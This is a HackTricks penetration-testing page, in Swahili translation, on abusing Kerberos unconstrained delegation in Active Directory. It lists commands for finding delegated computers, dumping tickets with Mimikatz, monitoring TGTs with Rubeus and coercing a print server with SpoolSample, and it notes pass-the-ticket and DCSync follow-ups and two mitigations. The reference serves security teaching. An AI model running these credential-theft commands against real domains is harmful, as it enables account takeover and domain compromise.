HackTricksUnconstrained Delegation
Reading time: 3 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Unconstrained delegation
Hii ni kipengele ambacho Msimamizi wa Domain anaweza kuweka kwa Kompyuta yoyote ndani ya domain. Kisha, wakati wowote mtumiaji anapoingia kwenye Kompyuta, nakala ya TGT ya mtumiaji huyo itakuwa inatumwa ndani ya TGS inayotolewa na DC na kuhifadhiwa kwenye kumbukumbu katika LSASS. Hivyo, ikiwa una mamlaka ya Msimamizi kwenye mashine, utaweza kudondosha tiketi na kujifanya kuwa watumiaji kwenye mashine yoyote.
Hivyo ikiwa msimamizi wa domain anaingia ndani ya Kompyuta yenye kipengele cha "Unconstrained Delegation" kimewashwa, na una mamlaka ya msimamizi wa ndani kwenye mashine hiyo, utaweza kudondosha tiketi na kujifanya kuwa Msimamizi wa Domain popote (domain privesc).
Unaweza kupata vitu vya Kompyuta vyenye sifa hii kwa kuangalia ikiwa sifa ya userAccountControl ina ADS_UF_TRUSTED_FOR_DELEGATION. Unaweza kufanya hivi kwa kutumia kichujio cha LDAP cha ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’, ambacho powerview inafanya:
# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser: /interval:10 #Check every 10s for new TGTs Pakia tiketi ya Msimamizi (au mtumiaji wa mwathirika) kwenye kumbukumbu kwa Mimikatz au Rubeus kwa Pass the Ticket.
Maelezo zaidi: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
Maelezo zaidi kuhusu Unconstrained delegation katika ired.team.
Force Authentication
Ikiwa mshambuliaji anaweza kudhoofisha kompyuta iliyo ruhusiwa kwa "Unconstrained Delegation", anaweza kudanganya Print server ku ingia kiotomatiki dhidi yake akihifadhi TGT kwenye kumbukumbu ya seva.
Kisha, mshambuliaji anaweza kufanya shambulio la Pass the Ticket kujifanya kuwa akaunti ya kompyuta ya Print server.
Ili kufanya print server iingie dhidi ya mashine yoyote unaweza kutumia SpoolSample:
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
Ikiwa TGT inatoka kwa mwelekeo wa kikoa, unaweza kufanya a DCSync attack na kupata hash zote kutoka kwa DC.
Maelezo zaidi kuhusu shambulio hili katika ired.team.
Hapa kuna njia nyingine za kujaribu kulazimisha uthibitisho:
{{#ref}} printers-spooler-service-abuse.md {{#endref}}
Mitigation
- Punguza logins za DA/Admin kwa huduma maalum
- Weka "Account is sensitive and cannot be delegated" kwa akaunti zenye mamlaka.
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.